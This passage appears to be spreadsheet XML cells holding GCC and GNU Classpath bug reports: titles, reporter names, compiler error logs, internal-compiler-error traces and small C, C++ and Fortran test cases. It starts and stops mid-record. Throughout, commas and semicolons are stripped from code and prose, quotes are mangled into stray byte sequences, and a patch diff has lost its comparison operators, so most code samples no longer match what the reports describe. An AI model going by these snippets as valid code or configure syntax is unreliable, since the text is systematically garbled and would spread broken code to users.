-c -DHAVE_CONFIG_H -O2 -g -O2  -I. -I../../../gcc/libiberty/../include  -W -Wall
-pedantic -Wwrite-strings -Wstrict-prototypes ../../../gcc/libiberty/regex.c -o
regex.o
../../../gcc/libiberty/regex.c:128: warning: function declaration isn't a prototype
../../../gcc/libiberty/regex.c:128: warning: conflicting types for built-in
function 'malloc'
../../../gcc/libiberty/regex.c:129: warning: function declaration isn't a prototype
In file included from ../../../gcc/libiberty/../include/xregex.h:26
                 from ../../../gcc/libiberty/regex.c:191:
../../../gcc/libiberty/../include/xregex2.h:538: warning: ISO C90 does not
support 'static' or type qualifiers in parameter array declarators
In file included from ../../../gcc/libiberty/regex.c:636:
../../../gcc/libiberty/regex.c: In function 'byte_regex_compile':
../../../gcc/libiberty/regex.c:2437: warning: implicit declaration of function
'free'
../../../gcc/libiberty/regex.c: In function 'byte_compile_range':
../../../gcc/libiberty/regex.c:4485: warning: signed and unsigned type in
conditional expression
../../../gcc/libiberty/regex.c:4495: warning: signed and unsigned type in
conditional expression
../../../gcc/libiberty/regex.c:4495: warning: signed and unsigned type in
conditional expression
../../../gcc/libiberty/regex.c: In function 'byte_re_compile_fastmap':
../../../gcc/libiberty/regex.c:4833: warning: implicit declaration of function
'abort'
../../../gcc/libiberty/regex.c:4833: warning: incompatible implicit declaration
of built-in function 'abort'
../../../gcc/libiberty/regex.c: In function 'byte_re_match_2_internal':
../../../gcc/libiberty/regex.c:7419: warning: incompatible implicit declaration
of built-in function 'abort'
../../../gcc/libiberty/regex.c: In function 'xre_comp':
../../../gcc/libiberty/regex.c:7817: warning: return discards qualifiers from
pointer target type
../../../gcc/libiberty/regex.c: In function 'xregerror':
../../../gcc/libiberty/regex.c:8076: warning: incompatible implicit declaration
of built-in function 'abort'
../../../gcc/libiberty/regex.c: In function 'byte_regex_compile':
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: error: invariant not recomputed when
ADDR_EXPR changed
../../../gcc/libiberty/regex.c:2283: internal compiler error: verify_stmts failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [regex.o] Error 1
make[2]: Leaving directory `/cygdrive/c/sf/gcc-build/i686-pc-cygwin/libiberty'
make[1]: *** [all-target-libiberty] Error 2
make[1]: Leaving directory `/cygdrive/c/sf/gcc-build'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>dims</t>
  </si>
  <si>
    <t>GCC-20857</t>
  </si>
  <si>
    <t>accepts non-variable as actual argument for intent(inout) dummy arg</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
MODULE TEST
CONTAINS
 SUBROUTINE TT(I)
   INTEGER INTENT(inOUT) :: I
 END SUBROUTINE TT
END MODULE TEST
USE TEST
CALL TT(0)
END</t>
  </si>
  <si>
    <t>GCC-19244</t>
  </si>
  <si>
    <t>[4.0 Regression] Typedef of anonymous class incorrectly handled in member function definition</t>
  </si>
  <si>
    <t>gcc 4.0 incorrectly rejects the following valid code:
typedef struct { void f() } f
void f::f() { }
It treats f::f as referring to a constructor and then gets confused because this isn't the right syntax for 
a constructor definition.  However (12.1/3) a typedef-name that names a class shall not be used as 
the identifier in the declarator for a constructor declaration.
Note that this only happens for an anonymous class.  If I instead write
typedef struct e { void f() } f
then this compiles without error.
This is a regression.  3.3 handles this correctly.</t>
  </si>
  <si>
    <t>GCC-53195</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE seg fault in lto (in set_is_used (tp=Unhandled dwarf expression opcode 0xf3 ) at ../.././gcc/tree-flow-inline.h:567)</t>
  </si>
  <si>
    <t>Created attachment 27289
directory with two source files from real-life code after pre-processor
difficult (for what I'm concerned)to reduce more
tar -xzf ltobug1.tgz
[innocent@vinavx0 ~/w3]$ c++ -O2 -flto -std=c++0x -shared -fPIC -o bha.so ltobug1/*.cc
In file included from :352:0:
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/include/c++/4.8.0/bits/stl_tree.h: In function '_ZNSt8_Rb_treeISsSt4pairIKSsN17PerformanceResult10ResultTypeEESt10_Select1stIS4_ESt4lessISsESaIS4_EE14_M_lower_boundEPSt13_Rb_tree_nodeIS4_ESD_RS1_.isra.197.17998.constprop.1309':
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/include/c++/4.8.0/bits/stl_tree.h:1093:5: internal compiler error: Segmentation fault
     _Rb_tree::
     ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: c++ returned 1 exit status
collect2: error: lto-wrapper returned 1 exit status
[innocent@vinavx0 ~/w3]$ c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/afs/cern.ch/user/i/innocent/w2/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/afs/cern.ch/user/i/innocent/w2 --enable-languages=cc++fortran -enable-gold=yes --enable-lto --with-build-config=bootstrap-lto --with-gmp-lib=/usr/local/lib64 --with-mpfr-lib=/usr/local/lib64 -with-mpc-lib=/usr/local/lib64 --enable-cloog-backend=isl --with-cloog=/usr/local --with-ppl-lib=/usr/local/lib64 CFLAGS='-O2 -ftree-vectorize -fPIC' CXXFLAGS='-O2 -fPIC -ftree-vectorize -fvisibility-inlines-hidden -march=native' -enable-libitm -disable-multilib
Thread model: posix
gcc version 4.8.0 20120428 (experimental) [trunk revision 186932] (GCC)</t>
  </si>
  <si>
    <t>GCC-39473</t>
  </si>
  <si>
    <t>Typo in untyped_call in i386.md</t>
  </si>
  <si>
    <t>untyped_call in i386.md has
  ix86_expand_call ((TARGET_FLOAT_RETURNS_IN_80387
                     ? gen_rtx_REG (XCmode FIRST_FLOAT_REG) : NULL)
                    operands[0] const0_rtx
                    GEN_INT ((DEFAULT_ABI == SYSV_ABI ? X86_64_SSE_REGPARM_MAX
                                                      : X64_SSE_REGPARM_MAX)
                             - 1)
                    NULL 0)
It doesn't look right for 32bit. Shouldn't it be GEN_INT (SSE_REGPARM_MAX)
instead?</t>
  </si>
  <si>
    <t>GCC-43348</t>
  </si>
  <si>
    <t>[4.4 regression] ICE in final_scan_insn at final.c:2604</t>
  </si>
  <si>
    <t>seen with current 4.4 branch on ia64-linux not on the trunk and 4.3. goes away removing -fno-strict-aliasing or setting the optimization to -Os or -O1:
$ g++ -c -g -O2 -fno-strict-aliasing SerializedScriptValue.ii
bindings/js/SerializedScriptValue.cpp: In function 'typename TreeWalker::OutputType WebCore::walk(TreeWalker&amp; typename TreeWalker::InputType) [with TreeWalker = WebCore::SerializingTreeWalker]':
bindings/js/SerializedScriptValue.cpp:343: error: could not split insn
(call_insn 4851 19696 19697 347 ../JavaScriptCore/wtf/Vector.h:284 (parallel [
            (call (mem:DI (const_int 0 [0x0]) [0 S8 A64])
                (const_int 1 [0x1]))
            (clobber (reg:DI 320 b0))
            (clobber (scratch:DI))
            (clobber (scratch:DI))
        ]) 354 {call_gp} (expr_list:REG_DEAD (reg:DI 1 r1)
        (expr_list:REG_EH_REGION (const_int 124 [0x7c])
            (nil)))
    (expr_list:REG_DEP_TRUE (use (reg:DI 1 r1))
        (nil)))
bindings/js/SerializedScriptValue.cpp:343: internal compiler error: in final_scan_insn at final.c:2604</t>
  </si>
  <si>
    <t>GCC-41674</t>
  </si>
  <si>
    <t>[4.5 Regression] /usr/ccs/bin/ld: Unsatisfied symbols: _GLOBAL__I_65535_0_main</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/struct/w_prof_global_array.c    -O3 -fwhole-
program -combine -fipa-type-escape -fprofile-generate  -lm   -o /test/gnu/gcc/ob
jdir/gcc/testsuite/gcc/w_prof_global_array.x01    (timeout = 300)
/usr/ccs/bin/ld: Unsatisfied symbols:
   _GLOBAL__I_65535_0_main (first referenced in /var/tmp//ccC7FsIt.o) (code)
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/usr/ccs/bin/ld: Unsatisfied symbols:
   _GLOBAL__I_65535_0_main (first referenced in /var/tmp//ccC7FsIt.o) (code)
collect2: ld returned 1 exit status
FAIL: gcc.dg/struct/w_prof_global_array.c compilation  -O3 -fwhole-program -com
bine -fipa-type-escape -fprofile-generate
Similar fails:
FAIL: gcc.dg/struct/w_prof_local_array.c compilation  -O3 -fwhole-program -comb
ine -fipa-type-escape -fprofile-generate
FAIL: gcc.dg/struct/w_prof_local_var.c compilation  -O3 -fwhole-program -combin
e -fipa-type-escape -fprofile-generate
FAIL: gcc.dg/struct/w_prof_single_str_global.c compilation  -O3 -fwhole-program
 -combine -fipa-type-escape -fprofile-generate
FAIL: gcc.dg/struct/w_prof_two_strs.c compilation  -O3 -fwhole-program -combine
 -fipa-type-escape -fprofile-generate
FAIL: gcc.dg/struct/w_ratio_cold_str.c compilation  -O3 -fwhole-program -combin
e -fipa-type-escape -fprofile-generate
_GLOBAL__I_65535_0_main is not global in the assembler output.</t>
  </si>
  <si>
    <t>GCC-34866</t>
  </si>
  <si>
    <t>valgrind error indication in testsuite from errors.c:156:cpp_error with gcc.dg/cpp/Wmissingdirs.c</t>
  </si>
  <si>
    <t>A r131535 of trunk bootstrapped with --enable-langugages=c
--enable-checking=releasevalgrind shows this indication for
gcc.dg/cpp/Wmissingdirs.c and also an ICE:
Executing on host: /tmp/hptest8/obj/gcc/xgcc -B/tmp/hptest8/obj/gcc/ /tmp/hptest8/gcc/gcc/testsuite/gcc.dg/cpp/Wmissingdirs.c   -s
td=gnu99 -I /jolly/well/better/not/exist -Wmissing-include-dirs -fno-show-column -fno-show-column -E  -o Wmissingdirs.i    (timeou
t = 300)
==23626== Invalid read of size 4
==23626==    at 0x9245B4: cpp_error (errors.c:156)
==23626==    by 0x4489FB: remove_duplicates (c-incpath.c:235)
==23626==    by 0x448B32: register_include_chains (c-incpath.c:331)
==23626==    by 0x44268B: c_common_post_options (c-opts.c:1029)
==23626==    by 0x5F5B1D: toplev_main (toplev.c:1732)
==23626==    by 0x387301E073: (below main) (in /lib64/libc-2.7.so)
==23626==  Address 0x4C67958 is not stack'd malloc'd or (recently) free'd
==23626== 
==23626== Invalid read of size 4
==23626==    at 0x92D464: linemap_lookup (line-map.c:282)
==23626==    by 0x9241CA: _cpp_begin_message (errors.c:47)
==23626==    by 0x9245C3: cpp_error (errors.c:159)
==23626==    by 0x4489FB: remove_duplicates (c-incpath.c:235)
==23626==    by 0x448B32: register_include_chains (c-incpath.c:331)
==23626==    by 0x44268B: c_common_post_options (c-opts.c:1029)
==23626==    by 0x5F5B1D: toplev_main (toplev.c:1732)
==23626==    by 0x387301E073: (below main) (in /lib64/libc-2.7.so)
==23626==  Address 0xC is not stack'd malloc'd or (recently) free'd
cc1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-23225</t>
  </si>
  <si>
    <t>[4.0 Regression] tree check: expected class type have exceptional (error_mark) in build_pointer_type_for_mode at tree.c:4246</t>
  </si>
  <si>
    <t xml:space="preserve">The code below gives the following error:
internal compiler error: tree check: expected class type have exceptional (error_mark) in 
build_pointer_type_for_mode at tree.c:4246
    This sounds like bug 18177 but that was supposedly fixed in 4.0.0.
    PalmSource bug 105393.
Here's the code:
typedef int32_t (*ProcPtr)()void Dispatcher(int32_t startCode)   (__builtin_offsetof (ArgsType 
largeMsgLen) + sizeof(Args.largeMsgLen)))
    __builtin_offsetof is necessary for the crash and is an artifact of preprocessing.  This is a Delta-
reduction of a larger file which fails without error under g++ 3.3.4 presumably correctly due to a 
missing include file.
Here's the session:
93&gt; /opt/gcc401chk/bin/g++ -v ../cpp/bugfiles/GCC_bugfiles/error/
105393_CertMgrDispatcher_min.i
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-checking --prefix=/opt/gcc401chk --enable-languages=cc+
+
Thread model: posix
gcc version 4.0.1
 /opt/gcc401chk/libexec/gcc/i686-pc-linux-gnu/4.0.1/cc1plus -fpreprocessed ../cpp/bugfiles/
GCC_bugfiles/error/105393_CertMgrDispatcher_min.i -quiet -dumpbase 
105393_CertMgrDispatcher_min.i -mtune=pentiumpro -auxbase 105393_CertMgrDispatcher_min -
version -o /tmp/cczS74RP.s
GNU C++ version 4.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.3.4 (pre 3.3.5 20040809).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
../cpp/bugfiles/GCC_bugfiles/error/105393_CertMgrDispatcher_min.i:1: error: ISO C++ forbids 
declaration of â€˜int32_tâ€™ with no type
../cpp/bugfiles/GCC_bugfiles/error/105393_CertMgrDispatcher_min.i:1: error: typedef â€˜int32_tâ€™ 
is initialized (use __typeof__ instead)
../cpp/bugfiles/GCC_bugfiles/error/105393_CertMgrDispatcher_min.i:1: error: â€˜ProcPtrâ€™ was not 
declared in this scope
../cpp/bugfiles/GCC_bugfiles/error/105393_CertMgrDispatcher_min.i:1: error: expected â€˜â€™ or </t>
  </si>
  <si>
    <t>GCC-51948</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression][OOP] Rejects valid: Function result value in MOVE_ALLOC nested in SELECT TYPE</t>
  </si>
  <si>
    <t>The following fails at move_alloc with bogus errors. The second example is based on the example from chapter09/burgers_factory_f2003/periodic_6th_order.F90 in the book http://www.cambridge.org/rouson
type t
end type t
contains
  function func(x)
    class(t) allocatable :: x(:) func(:)
    call move_alloc (x func)
! FAILS: Error: the 'from' and 'to' arguments of 'move_alloc' intrinsic at (1) must have the same rank 0/1
  end function
  function func2(x)
    type(t) allocatable :: x
    class(t) allocatable :: func2
    call move_alloc (x func)
! FAILS: Error: 'to' argument of 'move_alloc' intrinsic at (1) must be a variable
  end function
end</t>
  </si>
  <si>
    <t>CLASSPATH-55140</t>
  </si>
  <si>
    <t>Addition of exception to java.lang.String.codePointBefore breaks OpenJDK GenerateBreakIteratorData build tool run</t>
  </si>
  <si>
    <t>Exception in thread main java.lang.InternalError: java.lang.StringIndexOutOfBoundsException: String index out of range: 9
   at build.tools.generatebreakiteratordata.GenerateBreakIteratorData.generateFiles(GenerateBreakIteratorData.java:121)
   at build.tools.generatebreakiteratordata.GenerateBreakIteratorData.main(GenerateBreakIteratorData.java:70)
Caused by: java.lang.StringIndexOutOfBoundsException: String index out of range: 9
   at java.lang.String.codePointBefore(String.java:728)
   at build.tools.generatebreakiteratordata.RuleBasedBreakIteratorBuilder.parseRule(RuleBasedBreakIteratorBuilder.java:971)
   at build.tools.generatebreakiteratordata.RuleBasedBreakIteratorBuilder.buildStateTable(RuleBasedBreakIteratorBuilder.java:80\
9)
   at build.tools.generatebreakiteratordata.RuleBasedBreakIteratorBuilder.(RuleBasedBreakIteratorBuilder.java:203)
   at build.tools.generatebreakiteratordata.GenerateBreakIteratorData.generateDataFile(GenerateBreakIteratorData.java:131)
   at build.tools.generatebreakiteratordata.GenerateBreakIteratorData.generateFiles(GenerateBreakIteratorData.java:110)
   ...1 more
The check added in:
http://git.savannah.gnu.org/cgit/classpath.git/commit/?id=a1e2fbeff01860fc2c7ad5c8a0a6982e5ca14b95
does not match the specification:
IndexOutOfBoundsException - if the index argument is less than 1 or greater than the length of this string.
Fix is:
-    if (index = count)
+    if (index  count)</t>
  </si>
  <si>
    <t>GCC-3790</t>
  </si>
  <si>
    <t>code fails with splice_child_die at dwarf2out.c:4752</t>
  </si>
  <si>
    <t>Compiled snapshotgcc-20010716.  Get this error when using gcj:
  gcj -v -save-temps --main=HelloWorld -o HelloWorld HelloWorld.java
Reading specs from /usr/lanl/packages/gcc-3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.1/specs
Reading specs from /usr/lanl/packages/gcc-3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.1/../../../libgcj.spec
rename spec lib to liborig
rename spec startfile to startfileorig
Configured with: ./configure -prefix=/usr/lanl/packages/gcc-3.0 --enable-threads --enable-libgcj
Thread model: single
gcc version 3.0.1 20010716 (prerelease)
 /usr/lanl/packages/gcc-3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.1/jc1 HelloWorld.java -fuse-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -quiet -dumpbase HelloWorld.java -g1 -version -o HelloWorld.s
GNU Java version 3.0.1 20010716 (prerelease) (mips-sgi-irix6.5)
        compiled by GNU C version 3.0.1 20010716 (prerelease).
HelloWorld.java: In class `HelloWorld':
HelloWorld.java: In method `HelloWorld.main(java.lang.String[])':
HelloWorld.java:5: Internal compiler error in splice_child_die at dwarf2out.c:4752
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
	Please advise.
Thanks
Debbie
Release:
gcc-3.0.1
Environment:
Irix6.5.12</t>
  </si>
  <si>
    <t>dao</t>
  </si>
  <si>
    <t>GCC-569</t>
  </si>
  <si>
    <t>libstdc++ has problem with basic_string</t>
  </si>
  <si>
    <t>I get the following errors when I execute the following command on the attached file:
gcc -o dummy dummy.cc -lstdc++ -lpthread
basic_string __default_alloc_template &gt;::nilRep(data)                                                                
   __default_alloc_template::_S_end_free(data)                          
   __default_alloc_template::_S_start_free(data)                        
   __default_alloc_template::_S_free_list(data)                         
collect2: ld returned 1 exit status
Release:
unknown
Environment:
HPUX-9000 11.00
How-To-Repeat:
execute the above line on the attached file.  As far as I know it works on other systems.</t>
  </si>
  <si>
    <t>tongphan</t>
  </si>
  <si>
    <t>GCC-38584</t>
  </si>
  <si>
    <t>[4.3 Regression] Inline heuristics run even at -O0</t>
  </si>
  <si>
    <t>This is split off from PR38474 for clarity. Compiling the testcase of that PR 
(http://gcc.gnu.org/bugzilla/attachment.cgi?id=16873)
as
gfortran-4.3 -ffree-line-length-512 -g -ffree-form -ftime-report -c -O0 testcase.f90
requires about 20min in inline heuristics estimating the stack frame size. It also allocates 2.3Gb doing so.</t>
  </si>
  <si>
    <t>GCC-46804</t>
  </si>
  <si>
    <t>[4.5 Regression] gfortran.dg/char_cshift_2.f90 FAILs with -fregmove</t>
  </si>
  <si>
    <t>Created attachment 22632
auto-reduced testcase
Output:
$ /mnt/svn/gcc-trunk/binary-167453-lto-fortran-checking-yes-rtl-df/bin/gfortran -O -fPIC -fexpensive-optimizations -fgcse -foptimize-register-move -fpeel-loops -fno-tree-loop-optimize pr46804.f90
$ ./a.out 
Aborted
In the assembly the problem is apparent (intel syntax):
...
	mov	r12d DWORD PTR A.4.1573[rip+3]	# tmp310 A.4
	mov	DWORD PTR 16[rsp+r8*4] r12d	# shift3 tmp310
...
32bit (unaligned) value is loaded instead of sign-extend byte as is done without -fregmove:
...
	movsx	r11d BYTE PTR A.4.1573[rip+3]	# tmp310 A.4
	mov	DWORD PTR 16[rsp+r8*4] r11d	# shift3 tmp310
...
so shift3 contains invalid data
The problem seems to first appear in the 182r.regmove dump:
$ diff pr46804.f90.180r.ce2 pr46804.f90.182r.regmove
...
20092010c14091410
&lt;         (sign_extend:SI (reg:QI 236))) pr46804.f90:17 132 {extendqisi2}
&lt;      (expr_list:REG_DEAD (reg:QI 236)
---
&gt;         (reg:SI 236)) pr46804.f90:17 64 {*movsi_internal}
&gt;      (expr_list:REG_DEAD (reg:SI 236)
...
Output:
r167453 - fail
r158095 - fail
4.5 r166509 - fail
4.4 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-19298</t>
  </si>
  <si>
    <t>[4.0 Regression] dependent type (references) and calling a function method</t>
  </si>
  <si>
    <t>gcc CVS mainline 2005/01/06 09:53 PST
Configured with: /net/legless/scratch1/rwgk/gcc_cvs_head/configure --
prefix=/usr/local_cci/gcc_cvs_head_20050106 --enable-languages=cc++
Red Hat Enterprise Linux WS release 3 (Taroon)
Boost CVS mainline 2005/01/06 10:09 PST
% g++ -I/net/legless/scratch1/rwgk/hot/boost -I/usr/include/python2.2 -
E /net/legless/scratch1/rwgk/hot/boost/libs/python/test/args.cpp &gt; args_pp.cpp
% g++ -c args_pp.cpp
Lots of output ending with:
/net/legless/scratch1/rwgk/hot/boost/boost/python/object/make_ptr_instance.hpp:4
5: error: request for member â€˜get_class_objectâ€™ in 
â€˜boost::python::converter::detail::registered_base&lt;const volatile 
Y&amp;&gt;::convertersâ€™ which is of non-class type â€˜const 
boost::python::converter::registration&amp;â€™
The same code compiles with gcc 3.2.3 on the same machine.
I will attach the preprocessed source code. The same file is also available 
here:
http://cci.lbl.gov/~rwgk/bugs/gcc_cvs_head_20050106/args_pp.cpp.gz</t>
  </si>
  <si>
    <t>GCC-57926</t>
  </si>
  <si>
    <t>Atomic functions broken with C++ but not C?</t>
  </si>
  <si>
    <t>Note that this possible bug does not trigger with GCC only G++.
Try compiling the code in the attachment with g++. It'll give strange errors including complaining that an argument must be a non-void pointer when it IS in fact a non-void pointer.</t>
  </si>
  <si>
    <t>lailavrazda1979</t>
  </si>
  <si>
    <t>GCC-65963</t>
  </si>
  <si>
    <t>Missed vectorization of loads strided with &lt;&lt; when equivalent * succeeds</t>
  </si>
  <si>
    <t>This testcase does not vectorize at -O3 on x86_64/-mavx or AArch64:
void
loop (int *in int *out)
{
  for (int i = 0 i &lt; 256 i++) {
     out[i] = in[i &lt;&lt; 1] + 7
  }
}
-fdump-tree-vect-details reveals:
Creating dr for *_12
analyze_innermost: failed: evolution of base is not affine.
        base_address: 
        offset from base address: 
        constant offset from base address: 
        step: 
        aligned to: 
        base_object: *_12
However this testcase succeeds:
void
loop (int *in int *out)
{
  for (int i = 0 i &lt; 256 i++) {
     out[i] = in[i * 2] + 7
  }
}
The relevant extract of -fdump-tree-vect-details showing:
Creating dr for *_12
analyze_innermost: success.
        base_address: in_11(D)
        offset from base address: 0
        constant offset from base address: 0
        step: 8
        aligned to: 256
        base_object: *in_11(D)
        Access function 0: {0B + 8}_1
The only difference is the multiplication:
$ diff splice{2}.c.131t.ifcvt
27c27
&lt;   _8 = i_19 * 2
---
&gt;   _8 = i_19 &lt;&lt; 1
$</t>
  </si>
  <si>
    <t>GCC-56222</t>
  </si>
  <si>
    <t>Pointer to member in lambda should not require this to be captured</t>
  </si>
  <si>
    <t>In the example below gcc complains about this not being captures. This happens whenever a pointer to a member function is requested in a lambda. I tested with gcc-4.7.2.
struct Test {
    void y() { }
    void x() {
        [](Test  }(*this)
    }
}  
int main() {  Test().x() }</t>
  </si>
  <si>
    <t>boris.bigott</t>
  </si>
  <si>
    <t>GCC-3364</t>
  </si>
  <si>
    <t>[a29k-coff] fails to compile on gcc 3.0 CVS branch</t>
  </si>
  <si>
    <t>../gcc/configure --target=a29k-coff --with-gnu-as --with-gnu-ld --with-newlib --verbose --prefix=/usr1/tmp-tools --enable-languages=cc++ &amp;&amp; make
fails with this error:
gcc -c -DCROSS_COMPILE -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/config -I../../gcc/gcc/../include \
        ../../gcc/gcc/config/a29k/a29k.c -o a29k.o
../../gcc/gcc/config/a29k/a29k.c:43: conflicting types for `shift_constant_operand'
insn-codes.h:133: previous declaration of `shift_constant_operand'
../../gcc/gcc/config/a29k/a29k.c: In function `cint_8_operand':
../../gcc/gcc/config/a29k/a29k.c:100: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c: In function `cint_16_operand':
../../gcc/gcc/config/a29k/a29k.c:110: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c: In function `long_const_operand':
../../gcc/gcc/config/a29k/a29k.c:128: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c:129: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c:129: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c:130: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c:130: warning: comparison between signed and unsigned
../../gcc/gcc/config/a29k/a29k.c: In function `srcb_operand':
../../gcc/gcc/config/a29k/a29k.c:286: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c: In function `cmplsrcb_operand':
../../gcc/gcc/config/a29k/a29k.c:302: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c:302: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c: In function `load_multiple_operation':
../../gcc/gcc/config/a29k/a29k.c:604: warning: comparison between signed and unsigned
../../gcc/gcc/config/a29k/a29k.c: In function `store_multiple_operation':
../../gcc/gcc/config/a29k/a29k.c:647: warning: comparison between signed and unsigned
../../gcc/gcc/config/a29k/a29k.c: In function `masks_bits_for_special':
../../gcc/gcc/config/a29k/a29k.c:705: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc/gcc/config/a29k/a29k.c: In function `output_prolog':
../../gcc/gcc/config/a29k/a29k.c:1389: warning: implicit declaration of function `oballoc'
../../gcc/gcc/config/a29k/a29k.c:1406: warning: function `oballoc' was previously declared within a block
make[1]: *** [a29k.o] Error 1
Release:
gcc 3.0 CVS branch
Environment:
GNU/Linux RedHat 6.2 targetting a29k-coff
How-To-Repeat:
configure and build per description.
I used binutils 2.10.</t>
  </si>
  <si>
    <t>GCC-19966</t>
  </si>
  <si>
    <t>Misleading message must take exactly one argument</t>
  </si>
  <si>
    <t>The following invalid code snippet causes a bogus error message:
==============================
struct A
{
    static operator int()
}
==============================
bug.cc:3: error: 'static A::operator int()' must be a nonstatic member function
bug.cc:3: error: 'static A::operator int()' must take exactly one argument
The first part is ok but the second part is bogus as the operator
(once made non-static) will take no argument. Well the this-pointer
could be counted as an argument but this is nevertheless confusing
for the user. Especially since the second error message will indeed
go away if one adds a parameter.</t>
  </si>
  <si>
    <t>GCC-45689</t>
  </si>
  <si>
    <t>[F03] Missing transformational intrinsic in the trans_func_f2003 list</t>
  </si>
  <si>
    <t>While playing with modifications of PR4581 I tried
  module m
    implicit none
    type t
      integer :: i
    end type t
    type(t) dimension(2) parameter :: a1  = (/ t(1) t(2) /)
    type(t) dimension(2) parameter :: d = cshift ( a1 1 )
  end module m
and got
pr45081_red.f90:7.43:
    type(t) dimension(2) parameter :: d = cshift ( a1 1 )
                                           1
Error: transformational intrinsic 'cshift' at (1) is not permitted in an initialization expression
The F2003 standard says:
(5) A reference to a transformational standard intrinsic function other than NULL where each argument is an initialization expression
and the F2008 version adds:
(6) a reference to a transformational standard intrinsic function other than COMMAND ARGUMENT -COUNT NULL NUM IMAGES THIS IMAGE where each argument is a constant expression
This is fixed by the following patch:
--- ../_clean/gcc/fortran/expr.c	2010-09-09 21:06:18.000000000 +0200
+++ gcc/fortran/expr.c	2010-09-16 12:24:49.000000000 +0200
@@ -23297 +23297 @@ check_transformational (gfc_expr *e)
   }
   static const char * const trans_func_f2003[] =  {
-    all any count dot_product matmul null pack
+    all any count cshift dot_product eoshift matmul null pack
     product repeat reshape selected_char_kind selected_int_kind
     selected_real_kind spread sum transfer transpose
     trim unpack NULL
but then I am back to PR45081!-(even with the Paul's patch).</t>
  </si>
  <si>
    <t>GCC-39727</t>
  </si>
  <si>
    <t>[cond-optab] pessimization for FP compare with 0 on ColdFire</t>
  </si>
  <si>
    <t>double testit(double _Complex* t)
{
  return *t==0.0?0.0:-*t
}
includes useless sequence like
       clr.l -(%sp)clr.l -(%sp)fdmove.d (%sp)+%fp1
       fdmove.d (%a0)%fp0
       fcmp.d %fp1%fp0
where the first and last line are useless -- GCC could instead be using the flags as set by a fdmove.d instruction.</t>
  </si>
  <si>
    <t>GCC-68087</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE with constexpr in array with negative index</t>
  </si>
  <si>
    <t>Hi
GCC 6.0.0 20151025 and 5.2 crash with an ICE with the following code:
-- ice.cc
constexpr char c[] = hello
constexpr const char *p = c
void f()
{
    static_assert(*(p-1) == 'h' )
}
-- end of ice.cc
$ g++ --version
g++ (GCC) 6.0.0 20151025 (experimental)
$ g++ -std=c++11 -c ice.cc
ice.cc: In function â€˜void f()â€™:
ice.cc:6:37: internal compiler error: in tree_to_shwi at tree.c:7304
     static_assert(*(p-1) == 'h' )
                                     ^
0xf2fec2 tree_to_shwi(tree_node const*)
	../../gcc-git/gcc/tree.c:7304
0x7fc084 cxx_eval_array_reference
	../../gcc-git/gcc/cp/constexpr.c:1785
0x7fc084 cxx_eval_constant_expression
	../../gcc-git/gcc/cp/constexpr.c:3485
0x7fb18c cxx_eval_indirect_ref
	../../gcc-git/gcc/cp/constexpr.c:2588
0x7fb18c cxx_eval_constant_expression
